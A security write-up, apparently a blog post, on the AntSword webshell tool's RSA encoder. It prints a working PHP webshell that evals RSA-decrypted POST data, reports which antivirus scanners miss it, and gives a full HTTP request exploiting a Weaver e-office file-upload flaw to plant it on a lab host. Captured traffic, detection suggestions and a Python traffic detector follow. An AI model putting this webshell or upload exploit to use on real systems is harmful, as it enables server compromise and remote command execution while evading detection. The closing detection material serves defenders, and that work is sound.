AntSword (中国蚁剑) RSA asymmetric encryption: offense and defense
AntSword is an open-source, cross-platform website management tool aimed mainly at authorized penetration testers and at website administrators performing routine operations. Its traffic is obfuscated with encoders and decoders, which lets it bypass detection systems such as WAFs and IDS, and it ships with a range of practical plugins. This makes it very convenient for security testers and popular with many users.
https://github.com/AntSwordProject/antSword
Online RSA key generator
http://web.chacuo.net/netrsakeypair
Generating the public and private keys
Starting with AntSword v2.1.0, a PHP RSA encoder was added: the built-in RSA encoder module transports payloads with RSA asymmetric encryption. Create a new encoder -> RSA configuration -> click "generate key pair", then fill in the public key, private key and PHP code to generate a webshell dedicated to AntSword connections.
Encoder settings
Checking whether the generated webshell evades detection
D盾 (D-Shield): detected
冰河 webshell scanner: not detected
火绒 (Huorong): not detected
Uploading the webshell through the Weaver (泛微) e-office vulnerability
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 1289
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg
<?php
// AntSword RSA shell: the request parameter "ant" carries "|"-separated, base64-encoded
// RSA blocks; each block is recovered with the embedded public key and the result is eval'd.
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G
88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxv
JOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1e
W0EArkolkjFKe8Y4DQIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
    // openssl_public_decrypt() only succeeds for blocks produced with the matching private key
    if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
        $cmd .= $de;
    }
}
eval($cmd);
--e64bdf16c554bbc109cecef6451c26a4--
Webshell connection URL
Test setup (encoder RSA + decoder default)
http://10.211.55.9:8082/images/logo/logo-eoffice.php
Connection test succeeded
Capturing and analyzing the connection traffic through an HTTP proxy
Proxy configuration (Wireshark can also be used to capture the traffic)
First interaction packet
Encoder RSA + decoder default
Encoder RSA + decoder base64
Encoder RSA + decoder rot13
URL-decoding and then base64-decoding the request data yields only garbage.
Analysis of the encoder shows that the transmitted data is RSA-encrypted (the webshell recovers each block with the embedded public key) and base64-encoded for transport, which is how the traffic evades detection.
Connection traffic analysis
1. Base64:
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Content-Length: 2810
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:37 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 118
Connection: close
Content-Type: text/html; charset=utf-8
721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472
2. chr
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Content-Length: 2840
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:40 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 91
Connection: close
Content-Type: text/html; charset=utf-8
4629930P:/rbssvpr/jroebbg/vzntrf/ybtb P:Q: Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601 FLFGRZa9b886
3. default
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Content-Length: 2828
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:34 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 92
Connection: close
Content-Type: text/html; charset=utf-8
a96ed3a93C:/eoffice/webroot/images/logo C:D: Windows NT YUNZUI-PC 6.1 build 7601 SYSTEM690a7
AntSword's design and usage embody a good deal of thinking about offense-defense confrontation. Three detection suggestions follow:
First, detect the upload of the RSA webshell at the attack entry point, using static detection rules, a sandbox or a webshell scanning engine (covering both traffic and behavior).
Second, detect AntSword's strong traffic-side signatures; these can be extracted from the analysis above.
Third, run comprehensive monitoring through threat hunting and, when an anomaly is found, trace it back through full-packet capture to locate the attack.
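To make the second suggestion concrete, here is an added Python example (not code from the page or the AntSword project) that checks the two wire-format traits visible in the captures above: a request whose single form parameter is "|"-joined base64 chunks of exactly one RSA block each (128 bytes for the 1024-bit key on the page), and a response whose payload is wrapped in random hex and, with the base64 decoder, decodes to readable text. The request body is constructed; the response is the one captured in the first analysis above; the parameter name `ant` and the 16-character maximum wrapper length are assumptions.

```python
import base64
import binascii
from urllib.parse import parse_qs, quote

RSA_KEY_BITS = 1024              # the public key embedded in the shell above is 1024-bit,
CHUNK_BYTES = RSA_KEY_BITS // 8  # so every "|"-separated chunk decrypts from exactly 128 bytes
HEX = set("0123456789abcdef")

# Constructed sample (not real ciphertext): three 128-byte blocks joined the way the encoder does.
SAMPLE_RSA_BODY = "ant=" + quote("|".join(
    base64.b64encode(bytes([i]) * CHUNK_BYTES).decode() for i in range(3)), safe="")
# The base64-decoder response captured on this page (first capture above).
PAGE_RESPONSE = ("721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZ"
                 "VU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472")

def request_verdict(body, chunk_bytes=CHUNK_BYTES):
    """Flag a form body whose single parameter is '|'-joined base64 blobs, each exactly one RSA block."""
    fields = parse_qs(body, keep_blank_values=True)   # '+' must arrive as %2B, as in the captures
    if len(fields) != 1:
        return {"match": False}
    name, values = next(iter(fields.items()))
    chunks = []
    for part in values[0].split("|"):
        try:
            chunks.append(base64.b64decode(part, validate=True))
        except (binascii.Error, ValueError):
            return {"match": False}
    if len(chunks) >= 2 and all(len(c) == chunk_bytes for c in chunks):
        return {"match": True, "param": name, "chunks": len(chunks)}
    return {"match": False}

def unwrap_base64_response(body, max_pad=16):
    """Peel the random hex prefix/suffix off a base64-decoder response and decode the core."""
    for pre in range(max_pad + 1):
        if not set(body[:pre]) <= HEX:
            break
        for suf in range(max_pad + 1):
            if not set(body[len(body) - suf:]) <= HEX:
                break
            core = body[pre:len(body) - suf]
            if not core or len(core) % 4:
                continue
            try:
                text = base64.b64decode(core, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue
            if all(ch.isprintable() or ch in "\t\r\n" for ch in text):   # the real split is unique
                return text
    return None
```

The chunk-size test is the robust part: a different key length only changes `RSA_KEY_BITS`, while ordinary form posts never consist of several equal-sized base64 blocks.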